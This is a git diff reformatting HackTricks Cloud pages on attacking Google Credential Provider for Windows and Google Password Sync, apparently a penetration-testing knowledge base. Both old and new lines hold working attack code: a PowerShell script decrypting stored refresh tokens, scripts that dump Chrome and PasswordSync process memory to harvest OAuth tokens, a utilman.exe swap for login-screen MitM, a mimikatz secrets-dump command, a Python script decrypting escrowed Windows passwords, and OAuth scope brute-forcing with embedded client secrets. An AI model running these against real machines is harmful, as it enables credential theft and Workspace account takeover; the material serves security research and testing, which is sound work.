+curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
     echo -ne "Testing $scope           \r"
     if ! curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
      --data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
@@ -351,21 +334,7 @@ curl -X POST \
 # You could also change the password of a user for example
 ```
 
-{% hint style="danger" %}
-It's not possible to give the new user the Super Amin role because the **refresh token doesn't have enough scopes** to give the required privileges.
-{% endhint %}
+> [!CAUTION]
+> It's not possible to give the new user the Super Amin role because the **refresh token doesn't have enough scopes** to give the required privileges.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md
similarity index 80%
rename from pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md
rename to src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md
index 5e62c0b1e..8a7623ba3 100644
--- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md
+++ b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md
@@ -1,33 +1,18 @@
 # GCPW - Google Credential Provider for Windows
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
 This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store tokens to access Google Workspace in some places in the PC.
 
-{% hint style="success" %}
-Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**.
-{% endhint %}
+> [!TIP]
+> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**.
 
 ### GCPW - MitM
 
 When a user access a Windows PC synchronized with Google Workspace via GCPW it will need to complete a common login form. This login form will return an OAuth code that the PC will exchange for the refresh token in a request like:
 
-{% code overflow="wrap" %}
 ```http
 POST /oauth2/v4/token HTTP/2
 Host: www.googleapis.com
@@ -43,16 +28,14 @@ scope=https://www.google.com/accounts/OAuthLogin
 &device_id=d5c82f70-71ff-48e8-94db-312e64c7354f
 &device_type=chrome
 ```
-{% endcode %}
 
 New lines have been added to make it more readable.
 
-{% hint style="info" %}
-It was possible to perform a MitM by installing `Proxifier` in the PC, overwriting the `utilman.exe` binary with a `cmd.exe` and executing the **accessibility features** in the Windows login page, which will execute a **CMD** from which you can **launch and configure the Proxifier**.\
-Don't forget to **block QUICK UDP** traffic in `Proxifier` so it downgrades to TCP communication and you can see it.
-
-Also configure in "Serviced and other users" both options and install the Burp CA cert in the Windows.
-{% endhint %}
+> [!NOTE]
+> It was possible to perform a MitM by installing `Proxifier` in the PC, overwriting the `utilman.exe` binary with a `cmd.exe` and executing the **accessibility features** in the Windows login page, which will execute a **CMD** from which you can **launch and configure the Proxifier**.\
+> Don't forget to **block QUICK UDP** traffic in `Proxifier` so it downgrades to TCP communication and you can see it.
+>
+> Also configure in "Serviced and other users" both options and install the Burp CA cert in the Windows.
 
 Moreover adding the keys `enable_verbose_logging = 1` and `log_file_path = C:\Public\gcpw.log` in **`HKLM:\SOFTWARE\Google\GCPW`** it's possible to make it store some logs.
 
@@ -89,42 +72,37 @@ In **`HKCU:\SOFTWARE\Google\Accounts`** it's possible to access the email of the
 
 In **`HKLM:\SOFTWARE\Google\GCPW\Users`** it's possible to find the **domains** that are allowed to login in the key `domains_allowed` and in subkeys it's possible to find information about the user like email, pic, user name, token lifetimes, token handle...
 
-{% hint style="info" %}
-The token handle is a token that starts with `eth.` and from which can be extracted some info with a request like:
-
-{% code overflow="wrap" %}
-```bash
-curl -s 'https://www.googleapis.com/oauth2/v2/tokeninfo' \
-  -d 'token_handle=eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg'
-# Example response
-{
-  "audience": "77185425430.apps.googleusercontent.com",
-  "scope": "https://www.google.com/accounts/OAuthLogin",
-  "expires_in": 12880152
-}
-```
-{% endcode %}
-
-Also it's possible to find the token handle of an access token with a request like:
-
-{% code overflow="wrap" %}
-```bash
-curl -s 'https://www.googleapis.com/oauth2/v2/tokeninfo' \
-  -d 'access_token='
-# Example response
-{
-  "issued_to": "77185425430.apps.googleusercontent.com",
-  "audience": "77185425430.apps.googleusercontent.com",
-  "scope": "https://www.google.com/accounts/OAuthLogin",
-  "expires_in": 1327,
-  "access_type": "offline",
-  "token_handle": "eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg"
-}
-```
-{% endcode %}
-
-Afaik it's not possible obtain a refresh token or access token from the token handle.
-{% endhint %}
+> [!NOTE]
+> The token handle is a token that starts with `eth.` and from which can be extracted some info with a request like:
+>
+> ```bash
+> curl -s 'https://www.googleapis.com/oauth2/v2/tokeninfo' \
+>   -d 'token_handle=eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg'
+> # Example response
+> {
+>   "audience": "77185425430.apps.googleusercontent.com",
+>   "scope": "https://www.google.com/accounts/OAuthLogin",
+>   "expires_in": 12880152
+> }
+> ```
+>
+> Also it's possible to find the token handle of an access token with a request like:
+>
+> ```bash
+> curl -s 'https://www.googleapis.com/oauth2/v2/tokeninfo' \
+>   -d 'access_token='
+> # Example response
+> {
+>   "issued_to": "77185425430.apps.googleusercontent.com",
+>   "audience": "77185425430.apps.googleusercontent.com",
+>   "scope": "https://www.google.com/accounts/OAuthLogin",
+>   "expires_in": 1327,
+>   "access_type": "offline",
+>   "token_handle": "eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg"
+> }
+> ```
+>
+> Afaik it's not possible obtain a refresh token or access token from the token handle.
 
 Moreover, the file **`C:\ProgramData\Google\Credential Provider\Policies\\PolicyFetchResponse`** is a json containing the information of different **settings** like `enableDmEnrollment`, `enableGcpAutoUpdate`, `enableMultiUserLogin` (if several users from Workspace can login in the computer) and `validityPeriodDays` (number of days a user doesn't need to reauthenticate with Google directly).
 
@@ -166,7 +144,7 @@ function Get-RegistryKeysAndDecryptTokens {
                 # Decrypt the bytes using ProtectedData.Unprotect
                 $decryptedTokenBytes = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedTokenBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
                 $decryptedToken = [System.Text.Encoding]::UTF8.GetString($decryptedTokenBytes)
-                
+
                 Write-Output "Path: $keyPath"
                 Write-Output "Decrypted refresh_token: $decryptedToken"
                 Write-Output "-----------------------------"
@@ -193,11 +171,9 @@ Get-RegistryKeysAndDecryptTokens -keyPath $baseKey
 
 Example out:
 
-{% code overflow="wrap" %}
 ```
 Path: Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\SOFTWARE\Google\Accounts\100402336966965820570Decrypted refresh_token: 1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI
 ```
-{% endcode %}
 
 As explained in [**this video**](https://www.youtube.com/watch?v=FEQxHRRP_5I), if you don't find the token in the registry it's possible to modify the value (or delete) from **`HKLM:\SOFTWARE\Google\GCPW\Users\\th`** and the next time the user access the computer he will need to login again and the **token will be stored in the previous registry**.
 
@@ -205,12 +181,12 @@ As explained in [**this video**](https://www.youtube.com/watch?v=FEQxHRRP_5I), i
 
 The file **`%LocalAppData%\Google\Chrome\User Data\Local State`** stores the key to decrypt the **`refresh_tokens`** located inside the **Google Chrome profiles** of the user like:
 
-* `%LocalAppData%\Google\Chrome\User Data\Default\Web Data`
-* `%LocalAppData%\Google\Chrome\Profile*\Default\Web Data`
+- `%LocalAppData%\Google\Chrome\User Data\Default\Web Data`
+- `%LocalAppData%\Google\Chrome\Profile*\Default\Web Data`
 
 It's possible to find some **C# code** accessing these tokens in their decrypted manner in [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe).
 
-Moreover, the encrypting can be found in this code: [https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os\_crypt/sync/os\_crypt\_win.cc#L216](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L216)
+Moreover, the encrypting can be found in this code: [https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L216](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L216)
 
 It can be observed that AESGCM is used, the encrypted token starts with a **version** (**`v10`** at this time), then it [**has 12B of nonce**](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L42), and then it has the **cypher-text** with a final **mac of 16B**.
 
@@ -223,74 +199,74 @@ The following script can be used to **dump** every **Chrome** process using `pro
 Dump Chrome processes and search tokens
 
 ```powershell
-# Define paths for Procdump and Strings utilities   
-$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"   
-$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe"   
-$dumpFolder = "C:\Users\Public\dumps"   
- 
-# Regular expressions for tokens 
-$tokenRegexes = @( 
-    "ya29\.[a-zA-Z0-9_\.\-]{50,}", 
-    "1//[a-zA-Z0-9_\.\-]{50,}" 
+# Define paths for Procdump and Strings utilities
+$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"
+$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe"
+$dumpFolder = "C:\Users\Public\dumps"
+
+# Regular expressions for tokens
+$tokenRegexes = @(
+    "ya29\.[a-zA-Z0-9_\.\-]{50,}",
+    "1//[a-zA-Z0-9_\.\-]{50,}"
 )
- 
-# Create a directory for the dumps if it doesn't exist   
-if (!(Test-Path $dumpFolder)) {   
-    New-Item -Path $dumpFolder -ItemType Directory   
-}   
- 
-# Get all Chrome process IDs   
-$chromeProcesses = Get-Process -Name "chrome" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id   
- 
-# Dump each Chrome process   
-foreach ($processId in $chromeProcesses) {   
-    Write-Output "Dumping process with PID: $processId"   
-    & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"   
-}   
- 
-# Extract strings and search for tokens in each dump   
-Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {   
-    $dumpFile = $_.FullName   
-    $baseName = $_.BaseName 
-    $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"   
-    $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"   
- 
-    Write-Output "Extracting strings from $dumpFile"   
-    & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile   
-    & $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile   
- 
-    $outputFiles = @($asciiStringsFile, $unicodeStringsFile) 
- 
-    foreach ($file in $outputFiles) { 
-        foreach ($regex in $tokenRegexes) { 
- 
-            $matches = Select-String -Path $file -Pattern $regex -AllMatches 
- 
-            $uniqueMatches = @{} 
- 
-            foreach ($matchInfo in $matches) { 
-                foreach ($match in $matchInfo.Matches) { 
-                    $matchValue = $match.Value 
-                    if (-not $uniqueMatches.ContainsKey($matchValue)) { 
-                        $uniqueMatches[$matchValue] = @{ 
-                            LineNumber = $matchInfo.LineNumber 
-                            LineText   = $matchInfo.Line.Trim() 
-                            FilePath   = $matchInfo.Path 
-                        } 
-                    } 
-                } 
-            } 
- 
-            foreach ($matchValue in $uniqueMatches.Keys) { 
-                $info = $uniqueMatches[$matchValue] 
-                Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" 
-            } 
-        } 
- 
-        Write-Output "" 
-    } 
-} 
- 
+
+# Create a directory for the dumps if it doesn't exist
+if (!(Test-Path $dumpFolder)) {
+    New-Item -Path $dumpFolder -ItemType Directory
+}
+
+# Get all Chrome process IDs
+$chromeProcesses = Get-Process -Name "chrome" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id
+
+# Dump each Chrome process
+foreach ($processId in $chromeProcesses) {
+    Write-Output "Dumping process with PID: $processId"
+    & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
+}
+
+# Extract strings and search for tokens in each dump
+Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {
+    $dumpFile = $_.FullName
+    $baseName = $_.BaseName
+    $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
+    $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
+
+    Write-Output "Extracting strings from $dumpFile"
+    & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
+    & $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
+
+    $outputFiles = @($asciiStringsFile, $unicodeStringsFile)
+
+    foreach ($file in $outputFiles) {
+        foreach ($regex in $tokenRegexes) {
+
+            $matches = Select-String -Path $file -Pattern $regex -AllMatches
+
+            $uniqueMatches = @{}
+
+            foreach ($matchInfo in $matches) {
+                foreach ($match in $matchInfo.Matches) {
+                    $matchValue = $match.Value
+                    if (-not $uniqueMatches.ContainsKey($matchValue)) {
+                        $uniqueMatches[$matchValue] = @{
+                            LineNumber = $matchInfo.LineNumber
+                            LineText   = $matchInfo.Line.Trim()
+                            FilePath   = $matchInfo.Path
+                        }
+                    }
+                }
+            }
+
+            foreach ($matchValue in $uniqueMatches.Keys) {
+                $info = $uniqueMatches[$matchValue]
+                Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
+            }
+        }
+
+        Write-Output ""
+    }
+}
+
 Remove-Item -Path $dumpFolder -Recurse -Force
 ```
 
@@ -351,11 +327,10 @@ curl -s --data "client_id=77185425430.apps.googleusercontent.com" \
 
 ### GCPW - Scopes
 
-{% hint style="info" %}
-Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
-
-Alsoe, the refresh token is not valid in every application.
-{% endhint %}
+> [!NOTE]
+> Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
+>
+> Also, the refresh token is not valid in every application.
 
 By default GCPW won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`:
 
@@ -364,7 +339,7 @@ By default GCPW won't have access as the user to every possible OAuth scope, so
 Bash script to brute-force scopes
 
 ```bash
-curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do 
+curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
     echo -ne "Testing $scope           \r"
     if ! curl -s --data "client_id=77185425430.apps.googleusercontent.com" \
      --data "client_secret=OTJgUOQcT7lO7GsGZq2G4IlT" \
@@ -648,7 +623,7 @@ Some examples using some of those scopes:
 curl -X GET \
   -H "Authorization: Bearer $access_token" \
   "https://www.googleapis.com/oauth2/v2/userinfo"
-  
+
 {
   "id": "100203736939176354570",
   "email": "hacktricks@example.com",
@@ -823,8 +798,8 @@ curl -X POST \
 
 **Google Workspace Vault** is an add-on for Google Workspace that provides tools for data retention, search, and export for your organization's data stored in Google Workspace services like Gmail, Drive, Chat, and more.
 
-* A **Matter** in Google Workspace Vault is a **container** that organizes and groups together all the information related to a specific case, investigation, or legal matter. It serves as the central hub for managing **Holds**, **Searches**, and **Exports** pertaining to that particular issue.
-* A **Hold** in Google Workspace Vault is a **preservation action** applied to specific users or groups to **prevent the deletion or alteration** of their data within Google Workspace services. Holds ensure that relevant information remains intact and unmodified for the duration of a legal case or investigation.
+- A **Matter** in Google Workspace Vault is a **container** that organizes and groups together all the information related to a specific case, investigation, or legal matter. It serves as the central hub for managing **Holds**, **Searches**, and **Exports** pertaining to that particular issue.
+- A **Hold** in Google Workspace Vault is a **preservation action** applied to specific users or groups to **prevent the deletion or alteration** of their data within Google Workspace services. Holds ensure that relevant information remains intact and unmodified for the duration of a legal case or investigation.
 
 ```bash
 # List matters
@@ -868,7 +843,7 @@ mimikatz_trunk\x64\mimikatz.exe privilege::debug token::elevate lsadump::secrets
 
 Then search for the secret like `Chrome-GCPW-` like in the image:
 
-

+

 
 Then, with an **access token** with the scope `https://www.google.com/accounts/OAuthLogin` it's possible to request the private key to decrypt the password:
 
@@ -910,38 +885,38 @@ def decrypt_password(access_token, lsa_secret):
         # Obtain the private key using the resource_id
         resource_id = lsa_secret["resource_id"]
         encrypted_data = b64decode(lsa_secret["encrypted_password"])
-        
+
         private_key_pem = get_decryption_key(access_token, resource_id)
         print("Found private key:")
         print(private_key_pem)
-        
+
         if private_key_pem is None:
             raise ValueError("Unable to retrieve the private key.")
-        
+
         # Load the RSA private key
         rsa_key = RSA.import_key(private_key_pem)
         key_size = int(rsa_key.size_in_bits() / 8)
-        
+
         # Decrypt the encrypted data
         cipher_rsa = PKCS1_OAEP.new(rsa_key)
         session_key = cipher_rsa.decrypt(encrypted_data[:key_size])
-        
+
         # Extract the session key and other data from decrypted payload
         session_header = session_key[:32]
         session_nonce = session_key[32:]
         mac = encrypted_data[-16:]
-        
+
         # Decrypt the AES GCM data
         aes_cipher = AES.new(session_header, AES.MODE_GCM, nonce=session_nonce)
         decrypted_password = aes_cipher.decrypt_and_verify(encrypted_data[key_size:-16], mac)
-        
+
         print("Decrypted Password:", decrypted_password.decode("utf-8"))
-    
+
     except Exception as e:
         print(f"Error occurred during decryption: {e}")
 
 # CHANGE THIS INPUT DATA!
-access_token = "" 
+access_token = ""
 lsa_secret = {
     "encrypted_password": "",
     "resource_id": ""
@@ -954,25 +929,12 @@ decrypt_password(access_token, lsa_secret)
 
 It's possible to find the key components of this in the Chromium source code:
 
-* API domain: [https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22\&type=code](https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22\&type=code)
-* API endpoint: [https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential\_provider/gaiacp/password\_recovery\_manager.cc#L70](https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70)
+- API domain: [https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22\&type=code](https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22&type=code)
+- API endpoint: [https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70](https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70)
 
 ## References
 
-* [https://www.youtube.com/watch?v=FEQxHRRP\_5I](https://www.youtube.com/watch?v=FEQxHRRP_5I)
-* [https://issues.chromium.org/issues/40063291](https://issues.chromium.org/issues/40063291)
+- [https://www.youtube.com/watch?v=FEQxHRRP_5I](https://www.youtube.com/watch?v=FEQxHRRP_5I)
+- [https://issues.chromium.org/issues/40063291](https://issues.chromium.org/issues/40063291)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md
similarity index 54%
rename from pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md
rename to src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md
index 36b122aa6..5b76e330c 100644
--- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md
+++ b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md
@@ -1,19 +1,6 @@
 # GPS - Google Password Sync
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -25,21 +12,20 @@ It gets installed in `C:\Program Files\Google\Password Sync` where you can find
 
 To configure this binary (and service), it's needed to **give it access to a Super Admin principal in Workspace**:
 
-* Login via **OAuth** with Google and then it'll **store a token in the registry (encrypted)**
-  * Only available in Domain Controllers with GUI
-* Giving some **Service Account credentials from GCP** (json file) with permissions to **manage the Workspace users**
-  * Very bad idea as those credentials never expired and could be misused
-  * Very bad idea give a SA access over workspace as the SA could get compromised in GCP and it'll possible to pivot to Workspace
-  * Google require it for domain controlled without GUI
-  * These creds are also stored in the registry
+- Login via **OAuth** with Google and then it'll **store a token in the registry (encrypted)**
+  - Only available in Domain Controllers with GUI
+- Giving some **Service Account credentials from GCP** (json file) with permissions to **manage the Workspace users**
+  - Very bad idea as those credentials never expired and could be misused
+  - Very bad idea give a SA access over workspace as the SA could get compromised in GCP and it'll possible to pivot to Workspace
+  - Google require it for domain controlled without GUI
+  - These creds are also stored in the registry
 
 Regarding AD, it's possible to indicate it to use the current **applications context, anonymous or some specific credentials**. If the credentials option is selected, the **username** is stored inside a file in the **disk** and the **password** is **encrypted** and stored in the **registry**.
 
 ### GPS - Dumping password and token from disk
 
-{% hint style="success" %}
-Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even decrypt the password and token**.
-{% endhint %}
+> [!TIP]
+> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even decrypt the password and token**.
 
 In the file **`C:\ProgramData\Google\Google Apps Password Sync\config.xml`** it's possible to find part of the configuration like the **`baseDN`** of the AD configured and the **`username`** whose credentials are being used.
 
@@ -52,7 +38,7 @@ Moreover, it's also encoded using base32hex with the dictionary **`0123456789abc
 
 The entropy values were found by using the tool . It was configured to monitor the calls to **`CryptUnprotectData`** and **`CryptProtectData`** and then the tool was used to launch and monitor `PasswordSync.exe` which will decrypt the configured password and auth token at the beginning and the tool will **show the values for the entropy used** in both cases:
 
-

+

 
 Note that it's also possible to see the **decrypted** values in the input or output of the calls to these APIs also (in case at some point Winpeas stop working).
 
@@ -68,76 +54,76 @@ I guess you could also find the AD configured credentials.
 Dump PasswordSync.exe and the password_sync_service.exe processes and search tokens
 
 ```powershell
-# Define paths for Procdump and Strings utilities   
-$procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe"   
-$stringsPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\strings.exe"   
-$dumpFolder = "C:\Users\Public\dumps"   
- 
-# Regular expressions for tokens 
-$tokenRegexes = @( 
-    "ya29\.[a-zA-Z0-9_\.\-]{50,}", 
-    "1//[a-zA-Z0-9_\.\-]{50,}" 
-) 
- 
-# Show EULA if it wasn't accepted yet for strings 
-$stringsPath 
- 
-# Create a directory for the dumps if it doesn't exist   
-if (!(Test-Path $dumpFolder)) {   
-    New-Item -Path $dumpFolder -ItemType Directory   
-}   
- 
-# Get all Chrome process IDs   
+# Define paths for Procdump and Strings utilities
+$procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe"
+$stringsPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\strings.exe"
+$dumpFolder = "C:\Users\Public\dumps"
+
+# Regular expressions for tokens
+$tokenRegexes = @(
+    "ya29\.[a-zA-Z0-9_\.\-]{50,}",
+    "1//[a-zA-Z0-9_\.\-]{50,}"
+)
+
+# Show EULA if it wasn't accepted yet for strings
+$stringsPath
+
+# Create a directory for the dumps if it doesn't exist
+if (!(Test-Path $dumpFolder)) {
+    New-Item -Path $dumpFolder -ItemType Directory
+}
+
+# Get all Chrome process IDs
 $processNames = @("PasswordSync", "password_sync_service")
 $chromeProcesses = Get-Process | Where-Object { $processNames -contains $_.Name } | Select-Object -ExpandProperty Id
- 
-# Dump each Chrome process   
-foreach ($processId in $chromeProcesses) {   
-    Write-Output "Dumping process with PID: $processId"   
-    & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"   
-}   
- 
-# Extract strings and search for tokens in each dump   
